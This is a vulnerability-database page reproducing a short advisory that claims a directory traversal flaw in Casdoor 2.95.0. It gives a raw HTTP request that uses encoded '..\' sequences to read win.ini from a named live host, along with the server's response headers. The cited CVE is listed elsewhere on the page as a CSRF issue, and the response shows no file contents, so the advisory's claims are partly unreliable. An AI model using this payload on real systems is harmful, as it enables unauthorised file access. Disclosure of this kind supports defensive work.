Lucene search
K

πŸ“„ Casdoor 2.95.0 Directory Traversal

πŸ—“οΈΒ 11 Dec 2025Β 00:00:00Reported byΒ indoushkaTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstorm.newsπŸ‘Β 178Β Views

Casdoor version 2.95.0 is vulnerable to directory traversal enabling local file access such as win.ini.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-34927
22 Jun 202313:15
–attackerkb
CNNVD
Casdoor 跨站请求δΌͺι€ ζΌζ΄ž
22 Jun 202300:00
–cnnvd
CVE
CVE-2023-34927
22 Jun 202300:00
–cve
Cvelist
CVE-2023-34927
22 Jun 202300:00
–cvelist
Exploit DB
Casdoor < v1.331.0 - '/api/set-password' CSRF
2 Apr 202400:00
–exploitdb
Exploit DB
Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF)
16 Sep 202500:00
–exploitdb
Exploit DB
Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
29 Oct 202500:00
–exploitdb
EUVD
EUVD-2023-1883
3 Oct 202520:07
–euvd
Github Security Blog
Casdoor Cross-Site Request Forgery vulnerability
22 Jun 202315:30
–github
NVD
CVE-2023-34927
22 Jun 202313:15
–nvd
Rows per page
=============================================================================================================================================
    | # Title     : Casdoor 2.95.0 Directory Traversal                                                                                          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://casdoor.com                                                                                                         |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/211122/ & 	CVE-2023-34927
    
    [+] Summary : The vulnerability confirmed here is a Directory Traversal affecting an application running on Casdoor 2.95.0
    
    [+]  POC :	
    
    GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
    Host: door.casdoor.com
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Length: 92
    Content-Type: text/plain; charset=utf-8
    Date: Sat, 06 Dec 2025 14:35:45 GMT
    Last-Modified: Sat, 08 May 2021 08:18:31 GMT
    Server: beegoServer:1.12.3
    Set-Cookie: casdoor_session_id=891e4bf2d09b3240b7d1dd82ceba5c0f; Path=/; Expires=Mon, 05 Jan 2026 14:35:45 GMT; Max-Age=2592000; HttpOnly
    Original-Content-Encoding: gzip
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Dec 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.16.5
EPSS0.03093
SSVC
178